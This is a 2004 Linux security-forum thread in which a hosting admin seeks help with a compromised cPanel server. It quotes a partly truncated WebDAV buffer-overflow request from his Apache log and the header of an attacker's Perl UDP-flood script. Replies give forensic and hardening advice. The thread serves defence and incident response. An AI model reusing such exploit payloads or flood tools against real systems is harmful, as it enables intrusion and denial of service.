LinuxQuestions.org
View the Most Wanted LQ Wiki articles.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 07-16-2004, 05:19 AM   #1
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Rep: Reputation: 0
Unhappy Server Attack...every day, help:(


Hello,
every day somebody attack my server and put some files in my /var/tmp and /tmp/ directory and execute (on my serevr I have cPanel/WHM), I search in logs (usr/local/apache/domlogs and var/log) how he do that but I can`t find, only what I find today in domlogs is this code, what is this and can he do that with this code, how I can protect my server if he do that with this code:
66.79.55.12 - - [16/Jul/2004:07:26:54 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\x
b1\x02\xb1\x02\xb1\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
.
.
etc.
etc.
etc.
much more...and at end of this code is this:
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 354 "-"
"-"

Please somebody help me...this is big problem for me.
Thanks!
 
Old 07-16-2004, 06:23 AM   #2
ppuru
Senior Member
 
Registered: Mar 2003
Location: Beautiful BC
Distribution: RedHat & clones, Slackware, SuSE, OpenBSD
Posts: 1,791

Rep: Reputation: 47
the best thing you can do is backup your important config files, webpages format and reinstall the OS.

Read through the security refs on this forum to harden your os. ensure you connect your system to the net only after it is properly patched up, the firewall has opened only the ports that you need for your Internet presence.
 
Old 07-16-2004, 06:43 AM   #3
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0
Unhappy

But, I check my system with chkrootkit, rkhunter and with Panda free antivirus software and I don`t find trojans, viruses...nothing...

Some other way?

Thanks
 
Old 07-16-2004, 07:33 AM   #4
stickman
Senior Member
 
Registered: Sep 2002
Location: Nashville, TN
Posts: 1,552

Rep: Reputation: 53
Looks like the Apache log enty is and IIS WebDav exploit, and it's probably not related to the files in /var/tmp or /tmp. What are the files in those directories? I wouldn't go so as re-installing unless you know that you have a problem that can't be easily undone.
 
Old 07-16-2004, 07:55 AM   #5
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0
No, I don`t use IIS, on my server I use Linux/Apache....
Every day he put and execute in var/tmp files "vadimI", "f3", "sh" and some more names...I have copy of that files on my HD...that files use much CPU...
Also, he create directory in var/tmp with names like "....", ".c", ".x"....

But I can`t find that files in logs, how he run it, copy on that location....?
 
Old 07-16-2004, 09:25 AM   #6
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
First, you should definitely disconnect the system from the internet.

As a stickman pointed out, the buffer overflow you've posted is a common IIS WebDAV exploit and is likely un-related to the files. In fact, if the files are appearing every day, it sounds like they're being created locally by a cron job or something in the init process if your rebooting daily, so definitlely take a look at cron and cronttab. You should probably also take a look at the /etc/passwd file and see if you have any odd users and especially look for users other than root with a UID of 0. Try searching for strange SUID files (find / -perm -4000 -print) and SGID files (find / -perm -2000 -print) as well.

One thing to keep in mind, is that rootkits are really only tools used primarily to hide the presence of a cracker. So it's entirely possible to crack a system and never use a rootkit at all, it just makes the job of hiding a little easier.

Even if you do determine that the system has been cracked, remove the files and prevent their re-creation, you will need to re-install from trusted media. If the systems security has been compromised, it's extremely difficult to be sure that no other files are lurking somewhere else in the file system. When you re-install, look into running a file integrity IDS like tripwire, aide, samhain, etc. With one of these installed, you'll more than likely be able to determine what files have been added to the system or if any critical files have been altered, using a single command.

Last edited by Capt_Caveman; 07-16-2004 at 10:23 AM.
 
Old 07-16-2004, 12:40 PM   #7
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0
Angry

I think that I find where is problem!
In "/etc/cron.daily" dir I find much files:
00-logwatch@
logrotate*
rpm*
0anacron*
makewhatis.cron*
slocate.cron*
tmpwatch*

Is this normal? Do you have tmpwatch* ?
When I edit that file I find this:
/usr/sbin/tmpwatch 240 /tmp
/usr/sbin/tmpwatch 720 /var/tmp
for d in /var/{cache/man,catman}/{cat?,X11R6/cat?,local/cat?}; do
if [ -d "$d" ]; then
/usr/sbin/tmpwatch -f 720 $d
fi
done

When I search on google "tmpwatch" first result is:
"tmpwatch has a local denial of service and root exploit"

Is this problem?
What now?
 
Old 07-17-2004, 01:14 AM   #8
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
The contents of cron.daily are pretty normal, except the * and @ characters after the filenames, what linux distro are you using?. Also, don't forget to check crontab as well.

Tmpwatch is a normal linux application which is used to blow away tmp files that aren't being used. For more info, checkout the tmpwatch man page.

Have you looked into any of the other advice I've given?
 
Old 07-17-2004, 01:45 PM   #9
xmanxl
LQ Newbie
 
Registered: Jul 2004
Posts: 11

Original Poster
Rep: Reputation: 0
Unhappy

Today he add and run new file in var/tmp "udp.pl"!
Also, this use much CPU, when I click on "CPU/Memory/MySQL Usage" in WHM I see this:
Top Process %CPU 89.0 /usr/bin/perl ./udp.pl 200.222.175.87 139 1

Here is copy of header (udp.pl):
#!/usr/bin/perl
#####################################################
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
######################################################

Also, how he run this script for other scripts like ikonboard I see this for same user:
Top Process %CPU 67.0 /usr/bin/perl ikonboard.cgi

no "./ikonboard.cgi"!!!

Here is crontab -e output:
2,58 * * * * /usr/local/bandmin/bandmin
0 0 * * * /usr/local/bandmin/ipaddrmap
31 5 * * * /scripts/upcp
*/15 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1
0 6 * * * /scripts/cleanmsglog > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim callout > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim retry > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim reject > /dev/null 2>&1
0 6 * * * /usr/sbin/exim_tidydb /var/spool/exim wait-remote_smtp > /dev/null 2>$
*/5 * * * * /usr/local/cpanel/bin/dcpumon >/dev/null 2>&1

etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0perator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/html/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/bash

and users all "username:x:3xxxx:3xxxx::/home
(xxxx is some number)

find / -perm -4000 -print:
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/quota
/usr/bin/crontab
/usr/bin/lppasswd
/usr/local/apache/bin/suexec
/usr/local/cpanel/bin/cpwrap
/usr/local/cpanel/bin/jailshell
/usr/local/cpanel/cgi-sys/scgiwrap
/usr/sbin/exim
/usr/sbin/traceroute
/usr/sbin/suexec
/bin/su
find: /proc/3209/fd: No such file or directory
find: /proc/6268/fd: No such file or directory
find: /proc/24270/fd/4: No such file or directory
find: /proc/24586/fd: No such file or directory

find / -perm -2000 -print:
/var/cpanel/users
/usr/bin/wall
/usr/bin/slocate
/usr/local/cpanel/3rdparty/mailman
/usr/local/cpanel/3rdparty/mailman/Mailman
/usr/local/cpanel/3rdparty/mailman/Mailman/Archiver
/usr/local/cpanel/3rdparty/mailman/Mailman/Bouncers
/usr/local/cpanel/3rdparty/mailman/Mailman/Cgi
/usr/local/cpanel/3rdparty/mailman/Mailman/Handlers
/usr/local/cpanel/3rdparty/mailman/Mailman/Logging
/usr/local/cpanel/3rdparty/mailman/Mailman/Queue
/usr/local/cpanel/3rdparty/mailman/Mailman/MTA
/usr/local/cpanel/3rdparty/mailman/Mailman/Gui
/usr/local/cpanel/3rdparty/mailman/Mailman/Commands
/usr/local/cpanel/3rdparty/mailman/archives
/usr/local/cpanel/3rdparty/mailman/archives/private
/usr/local/cpanel/3rdparty/mailman/archives/private/aa_cpanel3.darkorb.net.mbox
/usr/local/cpanel/3rdparty/mailman/archives/private/mailman.mbox
/usr/local/cpanel/3rdparty/mailman/archives/private/mailman
/usr/local/cpanel/3rdparty/mailman/archives/public
/usr/local/cpanel/3rdparty/mailman/bin
/usr/local/cpanel/3rdparty/mailman/cgi-bin
/usr/local/cpanel/3rdparty/mailman/cgi-bin/handle_opts
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admin
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admindb
/usr/local/cpanel/3rdparty/mailman/cgi-bin/edithtml
/usr/local/cpanel/3rdparty/mailman/cgi-bin/subscribe
/usr/local/cpanel/3rdparty/mailman/cgi-bin/listinfo
/usr/local/cpanel/3rdparty/mailman/cgi-bin/options
/usr/local/cpanel/3rdparty/mailman/cgi-bin/private
/usr/local/cpanel/3rdparty/mailman/cgi-bin/roster
/usr/local/cpanel/3rdparty/mailman/cgi-bin/confirm
/usr/local/cpanel/3rdparty/mailman/cgi-bin/rmlist
/usr/local/cpanel/3rdparty/mailman/cron
/usr/local/cpanel/3rdparty/mailman/data
/usr/local/cpanel/3rdparty/mailman/filters
/usr/local/cpanel/3rdparty/mailman/icons
/usr/local/cpanel/3rdparty/mailman/lists
/usr/local/cpanel/3rdparty/mailman/lists/mailman
/usr/local/cpanel/3rdparty/mailman/locks
/usr/local/cpanel/3rdparty/mailman/logs
/usr/local/cpanel/3rdparty/mailman/mail
/usr/local/cpanel/3rdparty/mailman/mail/mailman
/usr/local/cpanel/3rdparty/mailman/qfiles
/usr/local/cpanel/3rdparty/mailman/qfiles/virgin
/usr/local/cpanel/3rdparty/mailman/qfiles/bounces
/usr/local/cpanel/3rdparty/mailman/qfiles/shunt
/usr/local/cpanel/3rdparty/mailman/qfiles/commands
/usr/local/cpanel/3rdparty/mailman/qfiles/archive
/usr/local/cpanel/3rdparty/mailman/qfiles/in
/usr/local/cpanel/3rdparty/mailman/qfiles/out
/usr/local/cpanel/3rdparty/mailman/qfiles/news
/usr/local/cpanel/3rdparty/mailman/qfiles/retry
/usr/local/cpanel/3rdparty/mailman/scripts
/usr/local/cpanel/3rdparty/mailman/spam
/usr/local/cpanel/3rdparty/mailman/templates
/usr/local/cpanel/3rdparty/mailman/templates/big5
/usr/local/cpanel/3rdparty/mailman/templates/cs
/usr/local/cpanel/3rdparty/mailman/templates/de
/usr/local/cpanel/3rdparty/mailman/templates/en
/usr/local/cpanel/3rdparty/mailman/templates/es
/usr/local/cpanel/3rdparty/mailman/templates/et
/usr/local/cpanel/3rdparty/mailman/templates/eu
/usr/local/cpanel/3rdparty/mailman/templates/fi
/usr/local/cpanel/3rdparty/mailman/templates/fr
/usr/local/cpanel/3rdparty/mailman/templates/gb
/usr/local/cpanel/3rdparty/mailman/templates/hu
/usr/local/cpanel/3rdparty/mailman/templates/it
/usr/local/cpanel/3rdparty/mailman/templates/ja
/usr/local/cpanel/3rdparty/mailman/templates/ko
/usr/local/cpanel/3rdparty/mailman/templates/lt
/usr/local/cpanel/3rdparty/mailman/templates/nl
